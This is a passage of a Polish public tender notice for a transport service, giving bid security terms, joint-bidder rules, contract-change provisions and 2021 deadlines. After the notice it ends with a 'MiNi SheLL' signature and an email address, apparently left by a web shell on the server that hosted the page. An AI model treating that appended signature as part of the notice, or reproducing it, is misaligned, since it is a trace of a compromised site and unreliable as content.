wadialny powinien być wystawiony na Zamawiającego jako<br/>beneficjenta gwarancji, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego<br/>na pierwsze pisemne żądanie Zamawiającego. Dokument wadialny powinien wskazywać<br/>wszystkie przesłanki zatrzymania wadium wskazane w art. 98 ust. 6 ustawy Pzp.<br/>5. Oryginał wadium, sporządzony w postaci dokumentu elektronicznego podpisanego<br/>kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu, nie może zawierać<br/>postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu<br/>gwarancyjnego do wystawcy.<br/>6. Wadium w formie pieniężnej należy wnieść przelewem na konto w Banku Spółdzielczym<br/>Ziemi Piotrkowskiej oddział w Rozprzy nr 82 8973 0003 0010 0000 0286 0004 z dopiskiem na<br/>przelewie: „Wadium w postępowaniu GZO.271.2.2021 usługa dowozu”<br/>7. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium<br/>w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko<br/>wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew i<br/>zaksięgował na rachunku Zamawiającego przed upływem terminu składania ofert. Wadium w innej formie niż pieniężna wnosi się wraz z ofertą w sposób przewidziany dla oferty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zasady składania oferty przez WYKONAWCÓW WSPÓLNIE ubiegających się o udzielenie<br/>zamówienia w tym SPÓŁKI CYWILNE:<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. spółka cywilna,<br/>konsorcjum). W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za<br/>wykonanie umowy;<br/>2) w przypadku wspólnego ubiegania się o udzielenie zamówienia, Wykonawcy wskazują w<br/>formularzu oferty dane wszystkich podmiotów wspólnie ubiegających się o udzielenie<br/>zamówienia oraz ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania ich w postępowaniu o udzielenie zamówienia i<br/>zawarcia umowy w sprawę zamówienia publicznego. Do oferty należy załączyć to pełnomocnictwo;<br/>3) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają usługi do których te zdolności są wymagane;<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są zobowiązani złożyć<br/>oświadczenie, o którym mowa w art. 117 ust. 4 Pzp, określające, które usługi wykonają<br/>poszczególni Wykonawcy (PKT 9 FORMULARZA OFERTY stanowiącego załącznik nr 1 do<br/>SWZ);<br/>5) w przypadku wspólnego ubiegania się o udzielenie zamówienia, oświadczenie, o którym<br/>mowa w art. 125 ust. 1 (załącznik nr 2 do SWZ) składa każdy Wykonawca. Oświadczenie to<br/>będzie potwierdzać brak podstaw do wykluczenia oraz spełnienie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu. Oświadczenie składa się w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>6) jeżeli oferta Wykonawcy wspólnie ubiegającego się o zamówienie zostanie wybrana,<br/>Zamawiający zażąda, przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy<br/>regulującej współpracę tych wykonawców; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, określone zostały w załączniku nr 5 do SWZ<br/>Zamawiający, zgodnie z art. 455 ust. 1 ustawy Pzp, przewiduje możliwość dokonania zmian<br/>postanowień zawartej umowy w sprawie zamówienia publicznego, w sposób i na warunkach<br/>określonych w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-26 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-26 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com